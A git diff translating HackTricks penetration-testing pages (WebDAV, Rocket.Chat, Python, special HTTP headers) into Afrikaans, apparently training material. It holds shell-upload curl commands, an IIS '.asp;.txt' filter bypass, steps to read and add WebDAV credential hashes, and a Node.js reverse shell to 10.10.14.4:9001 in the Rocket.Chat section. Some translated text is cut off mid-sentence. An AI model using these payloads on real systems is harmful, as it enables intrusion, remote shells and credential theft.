+Jy kan hierdie instrument gebruik om **verbind te maak met die WebDav**-bediener en handelinge (soos **oplaai**, **verskuif** of **verwyder**) **handmatig** uit te voer.
 ```
 cadaver 
 ```
+## PLAAS AANVRAAG
 
-## PUT request
+`PUT` is 'n HTTP-metode wat gebruik word om 'n nuwe bron te skep of 'n bestaande bron te vervang met die inhoud wat in die versoekliggaam verskaf word. Dit word dikwels gebruik in die konteks van WebDAV (Web Distributed Authoring and Versioning) om lêers op 'n bediener te skep of te vervang.
 
+### Hoe dit werk
+
+Wanneer 'n `PUT`-versoek na 'n bediener gestuur word, moet die versoekliggaam die inhoud van die lêer bevat wat geskep of vervang moet word. Die bediener sal dan die inhoud van die versoekliggaam neem en dit stoor as die nuwe inhoud van die lêer. As die lêer reeds bestaan, sal die bediener dit vervang met die nuwe inhoud.
+
+### WebDAV en `PUT`
+
+WebDAV is 'n uitbreiding van die HTTP-protokol wat spesifieke metodes, soos `PUT`, definieer vir die skep en bestuur van lêers op 'n bediener. Deur die `PUT`-metode te gebruik, kan 'n kliëntprogram 'n lêer op 'n WebDAV-bediener skep of vervang.
+
+### Sekuriteitsimpakte
+
+Die `PUT`-metode kan sekuriteitsrisiko's inhou as dit nie behoorlik geïmplementeer of beperk word nie. Dit kan 'n aanvaller in staat stel om lêers te skep, te vervang of te oorskryf op 'n bediener, wat kan lei tot ongewenste veranderinge of datalekke. Dit is belangrik om die toegang tot die `PUT`-metode te beperk tot vertroude gebruikers en om behoorlike toegangsbeheermaatreëls te implementeer om misbruik te voorkom.
 ```
 curl -T 'shell.txt' 'http://$ip'
 ```
+## VERSKUIF versoek
 
-## MOVE request
+The MOVE request is used in WebDAV to move a resource from one location to another. It is similar to the HTTP PUT method, but instead of creating a new resource, it moves an existing resource to a different location.
 
+Die VERSKUIF versoek word gebruik in WebDAV om 'n bron van die een plek na die ander te skuif. Dit is soortgelyk aan die HTTP PUT-metode, maar in plaas daarvan om 'n nuwe bron te skep, skuif dit 'n bestaande bron na 'n ander plek.
 ```
 curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
 ```
-
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## IIS5/6 WebDav Vulnerability
+## IIS5/6 WebDav Kwesbaarheid
 
-This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
+Hierdie kwesbaarheid is baie interessant. Die **WebDav** staan **nie toe** dat lêers met die uitbreiding **.asp** geüpload of hernoem word nie. Maar jy kan dit **omseil** deur aan die einde van die naam **";.txt"** by te voeg en die lêer sal uitgevoer word asof dit 'n .asp-lêer is (jy kan ook **".html" in plaas van ".txt"** gebruik, maar **moenie die ";" vergeet nie**).
 
-Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
+Dan kan jy jou dop as 'n ".**txt-lêer**" oplaai en dit na 'n ".asp;.txt" lêer **kopieer/verskuif**. Deur toegang tot daardie lêer via die webbediener, sal dit **uitgevoer** word (cadaver sal sê dat die skuifaksie nie gewerk het nie, maar dit het wel).
 
 ![](<../../.gitbook/assets/image (18) (1) (1).png>)
 
-## Post credentials
+## Naam en wagwoord
 
-If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\
+As die Webdav 'n Apache-bediener gebruik het, moet jy kyk na die gekonfigureerde webwerwe in Apache. Gewoonlik:\
 _**/etc/apache2/sites-enabled/000-default**_
 
-Inside it you could find something like:
-
+Binne-in kan jy iets soos die volgende vind:
 ```
 ServerAdmin webmaster@localhost
-        Alias /webdav /var/www/webdav
-        
-                DAV On
-                AuthType Digest
-                AuthName "webdav"
-                AuthUserFile /etc/apache2/users.password
-                Require valid-user
+Alias /webdav /var/www/webdav
+
+DAV On
+AuthType Digest
+AuthName "webdav"
+AuthUserFile /etc/apache2/users.password
+Require valid-user
 ```
-
-As you can see there is the files with the valid **credentials** for the **webdav** server:
-
+Soos u kan sien, is daar die lêers met die geldige **volmagte** vir die **webdav**-bediener:
 ```
 /etc/apache2/users.password
 ```
+Binne-in hierdie tipe lêers sal jy die **gebruikersnaam** en 'n **hash** van die wagwoord vind. Dit is die geloofsbriewe wat die webdav-bediener gebruik om gebruikers te verifieer.
 
-Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
-
-You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
-
+Jy kan probeer om hulle te **kraak**, of om **meer by te voeg** as jy om een of ander rede toegang tot die **webdav**-bediener wil hê:
 ```bash
 htpasswd /etc/apache2/users.password  #You will be prompted for the password
 ```
-
-To check if the new credentials are working you can do:
-
+Om te kontroleer of die nuwe geloofsbriewe werk, kan jy die volgende doen:
 ```bash
 wget --user  --ask-password http://domain/path/to/webdav/ -O - -q
 ```
-
-## References
+## Verwysings
 * [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
 
 

 
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/network-services-pentesting/pentesting-web/python.md b/network-services-pentesting/pentesting-web/python.md
index 660eabd43..40673cbac 100644
--- a/network-services-pentesting/pentesting-web/python.md
+++ b/network-services-pentesting/pentesting-web/python.md
@@ -2,27 +2,25 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-## Server using python
-
-test a possible **code execution**, using the function _str()_:
+## Bediener wat Python gebruik
 
+toets 'n moontlike **kodes uitvoering**, deur die _str()_ funksie te gebruik:
 ```python
 "+str(True)+" #If the string True is printed, then it is vulnerable
 ```
-
-### Tricks
+### Truuks
 
 {% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
 [bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
@@ -38,14 +36,14 @@ test a possible **code execution**, using the function _str()_:
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 54ede2407..a42739c3e 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -2,60 +2,58 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 ## RCE
 
-If you are admin inside Rocket Chat you can get RCE.
+As jy 'n admin binne Rocket Chat is, kan jy RCE kry.
 
-* Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**.
-  * `/admin/integrations/incoming`
+* Gaan na **`Integrations`** en kies **`New Integration`** en kies enigeen: **`Incoming WebHook`** of **`Outgoing WebHook`**.
+* `/admin/integrations/incoming`
 
 

 
-* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like:
-
+* Volgens die [dokumentasie](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So laat ons 'n [rev shell vir javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kry soos:
 ```javascript
 const require = console.log.constructor('return process.mainModule.require')();
 const { exec } = require('child_process');
 exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
 ```
-
-* Configure the WebHook (the channel and post as username must exists):
+* Stel die WebHook in (die kanaal en pos as gebruikersnaam moet bestaan):
 
 

 
-* Configure WebHook script:
+* Stel die WebHook-skrip in:
 
 

 
-* Save changes
-* Get the generated WebHook URL:
+* Stoor veranderinge
+* Kry die gegenereerde WebHook URL:
 
 

 
-* Call it with curl and you shuold receive the rev shell
+* Roep dit aan met curl en jy behoort die rev shell te ontvang
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/special-http-headers.md b/network-services-pentesting/pentesting-web/special-http-headers.md
index 30d8382e5..dba43bdf6 100644
--- a/network-services-pentesting/pentesting-web/special-http-headers.md
+++ b/network-services-pentesting/pentesting-web/special-http-headers.md
@@ -1,27 +1,27 @@
-# Special HTTP headers
+# Spesiale HTTP-koppe
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-## Wordlists & Tools
+## Woordlyste & Gereedskap
 
 * [https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers](https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers)
 * [https://github.com/rfc-st/humble](https://github.com/rfc-st/humble)
 
-## Headers to Change Location
+## Koppe om Ligging te Verander
 
-Rewrite **IP source**:
+Herskryf **IP-bron**:
 
 * `X-Originating-IP: 127.0.0.1`
 * `X-Forwarded-For: 127.0.0.1`
@@ -38,16 +38,16 @@ Rewrite **IP source**:
 * `True-Client-IP: 127.0.0.1`
 * `Cluster-Client-IP: 127.0.0.1`
 * `Via: 1.0 fred, 1.1 127.0.0.1`
-* `Connection: close, X-Forwarded-For` (Check hop-by-hop headers)
+* `Connection: close, X-Forwarded-For` (Kyk hop-by-hop-koppe na)
 
-Rewrite **location**:
+Herskryf **ligging**:
 
 * `X-Original-URL: /admin/console`
 * `X-Rewrite-URL: /admin/console`
 
-## Hop-by-Hop headers
+## Hop-by-Hop-koppe
 
-A hop-by-hop header is a header which is designed to be processed and consumed by the proxy currently handling the request, as opposed to an end-to-end header.
+'n Hop-by-hop-kop is 'n kop wat ontwerp is om verwerk en verbruik te word deur die tans hanteerende proksi, in teenstelling met 'n end-to-end-kop.
 
 * `Connection: close, X-Forwarded-For`
 
@@ -55,7 +55,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 [abusing-hop-by-hop-headers.md](../../pentesting-web/abusing-hop-by-hop-headers.md)
 {% endcontent-ref %}
 
-## HTTP Request Smuggling
+## HTTP-versoeksmokkelary
 
 * `Content-Length: 30`
 * `Transfer-Encoding: chunked`
@@ -64,90 +64,86 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
 [http-request-smuggling](../../pentesting-web/http-request-smuggling/)
 {% endcontent-ref %}
 
-## Cache Headers
+## Kaskoppe
 
-**Server Cache Headers**:
+**Bedienerkaskoppe**:
 
-* **`X-Cache`** in the response may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached
-* **`Cache-Control`** indicates if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
-* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed.
-* **`Age`** defines the times in seconds the object has been in the proxy cache.
-* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
+* **`X-Cache`** in die respons kan die waarde **`miss`** hê as die versoek nie gekasheer is nie en die waarde **`hit`** as dit gekasheer is
+* **`Cache-Control`** dui aan of 'n bron gekasheer word en wanneer die bron weer gekasheer sal word: `Cache-Control: public, max-age=1800`
+* **`Vary`** word dikwels in die respons gebruik om **bykomende koppe** aan te dui wat as **deel van die kassleutel** hanteer word, selfs al is hulle normaalweg nie gesleutel nie.
+* **`Age`** definieer die tyd in sekondes wat die voorwerp in die proksi-kas was.
+* **`Server-Timing: cdn-cache; desc=HIT`** dui ook aan dat 'n bron gekasheer is
 
 {% content-ref url="../../pentesting-web/cache-deception.md" %}
 [cache-deception.md](../../pentesting-web/cache-deception.md)
 {% endcontent-ref %}
 
-**Local Cache headers**:
+**Plaaslike kaskoppe**:
 
-* `Clear-Site-Data`: Header to indicate the cache that should be removed: `Clear-Site-Data: "cache", "cookies"`
-* `Expires`: Contains date/time when the response should expire: `Expires: Wed, 21 Oct 2015 07:28:00 GMT`
-* `Pragma: no-cache` same as `Cache-Control: no-cache`
-* `Warning`: The **`Warning`** general HTTP header contains information about possible problems with the status of the message. More than one `Warning` header may appear in a response. `Warning: 110 anderson/1.3.37 "Response is stale"`
+* `Clear-Site-Data`: Kop om aan te dui watter kas verwyder moet word: `Clear-Site-Data: "cache", "cookies"`
+* `Expires`: Bevat die datum/tyd wanneer die respons moet verval: `Expires: Wed, 21 Oct 2015 07:28:00 GMT`
+* `Pragma: no-cache` dieselfde as `Cache-Control: no-cache`
+* `Warning`: Die **`Warning`** algemene HTTP-kop bevat inligting oor moontlike probleme met die status van die boodskap. Meer as een `Warning`-kop kan in 'n respons voorkom. `Warning: 110 anderson/1.3.37 "Response is stale"`
 
-## Conditionals
+## Voorwaardelik
 
-* Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header\*\*`Last-Modified`\*\* contains a different time.
-* Conditional requests using **`If-Match`** and **`If-None-Match`** use an Etag value so the web server will send the content of the response if the data (Etag) has changed. The `Etag` is taken from the HTTP response.
-  * The **Etag** value is usually **calculated based** on the **content** of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1** of **37 bytes**.
+* Versoeke met hierdie koppe: **`If-Modified-Since`** en **`If-Unmodified-Since`** sal slegs met data reageer as die responskop\*\*`Last-Modified`\*\* 'n ander tyd bevat.
+* Voorwaardelike versoeke met **`If-Match`** en **`If-None-Match`** gebruik 'n Etag-waarde sodat die webbediener die inhoud van die respons sal stuur as die data (Etag) verander het. Die `Etag` word geneem uit die HTTP-respons.
+* Die **Etag**-waarde word gewoonlik **bereken op grond** van die **inhoud** van die respons. Byvoorbeeld, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` dui aan dat die `Etag` die **Sha1** van **37 byte** is.
 
-## Range requests
+## Reeksversoeke
 
-* **`Accept-Ranges`**: Indicates if the server supports range requests, and if so in which unit the range can be expressed. `Accept-Ranges: `
-* **`Range`**: Indicates the part of a document that the server should return.
-* **`If-Range`**: Creates a conditional range request that is only fulfilled if the given etag or date matches the remote resource. Used to prevent downloading two ranges from incompatible version of the resource.
-* **`Content-Range`**: Indicates where in a full body message a partial message belongs.
+* **`Accept-Ranges`**: Dui aan of die bediener reeksversoeke ondersteun, en indien wel, in watter eenheid die reeks uitgedruk kan word. `Accept-Ranges: `
+* **`Range`**: Dui die deel van 'n dokument aan wat die bediener moet terugstuur.
+* **`If-Range`**: Skep 'n voorwaardelike reeksversoek wat slegs vervul word as die gegewe etiket of datum ooreenstem met die afgelewerde bron. Word gebruik om te voorkom dat twee reekse vanaf 'n onverenigbare weergawe van die bron afgelaai word.
+* **`Content-Range`**: Dui aan waar in 'n volledige boodskap 'n gedeeltelike boodskap hoort.
 
-## Message body information
+## Inligting oor boodskapliggaam
 
-* **`Content-Length`:** The size of the resource, in decimal number of bytes.
-* **`Content-Type`**: Indicates the media type of the resource
-* **`Content-Encoding`**: Used to specify the compression algorithm.
-* **`Content-Language`**: Describes the human language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language.
-* **`Content-Location`**: Indicates an alternate location for the returned data.
+* **`Content-Length`:** Die grootte van die bron, in desimale getal van byte.
+* **`Content-Type`**: Dui die media-tipe van die bron aan
+* **`Content-Encoding`**: Word gebruik om die kompressie-algoritme aan te dui.
+* **`Content-Language`**: Beskryf die menslike taal(tale) bedoel vir die gehoor, sodat dit 'n gebruiker in staat stel om te onderskei volgens die gebruikers se eie voorkeurstaal.
+* **`Content-Location`**: Dui 'n alternatiewe ligging vir die teruggekeerde data aan.
 
-From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.**\
-For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests:
+Vanuit 'n pentest-oogpunt is hierdie inligting gewoonlik "nutteloos", maar as die bron **beskerm** word deur 'n 401 of 403 en jy kan 'n **manier** vind om hierdie **inligting** te **kry**, kan dit **interessant** wees.\
+Byvoorbeeld, 'n kombinasie van **`Range`** en
+## Bedienerinligting
 
-* A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y`
-
-## Server Info
-
-* `Server: Apache/2.4.1 (Unix)`
+* `Bediener: Apache/2.4.1 (Unix)`
 * `X-Powered-By: PHP/5.3.3`
 
-## Controls
+## Beheer
 
-* **`Allow`**: This header is used to communicate the HTTP methods a resource can handle. For example, it might be specified as `Allow: GET, POST, HEAD`, indicating that the resource supports these methods.
-* **`Expect`**: Utilized by the client to convey expectations that the server needs to meet for the request to be processed successfully. A common use case involves the `Expect: 100-continue` header, which signals that the client intends to send a large data payload. The client looks for a `100 (Continue)` response before proceeding with the transmission. This mechanism helps in optimizing network usage by awaiting server confirmation.
+* **`Allow`**: Hierdie kop is gebruik om die HTTP-metodes te kommunikeer wat 'n hulpbron kan hanteer. Byvoorbeeld, dit kan gespesifiseer word as `Allow: GET, POST, HEAD`, wat aandui dat die hulpbron hierdie metodes ondersteun.
+* **`Expect`**: Dit word deur die kliënt gebruik om verwagtinge oor te dra wat die bediener moet nakom vir die versoek om suksesvol verwerk te word. 'n Algemene gebruikssituasie behels die `Expect: 100-continue` kop, wat aandui dat die kliënt van plan is om 'n groot data-pakket te stuur. Die kliënt soek na 'n `100 (Continue)`-reaksie voordat hy met die oordrag voortgaan. Hierdie meganisme help om netwerkgebruik te optimaliseer deur op bevestiging van die bediener te wag.
 
-## Downloads
+## Aflaai
 
-* The **`Content-Disposition`** header in HTTP responses directs whether a file should be displayed **inline** (within the webpage) or treated as an **attachment** (downloaded). For instance:
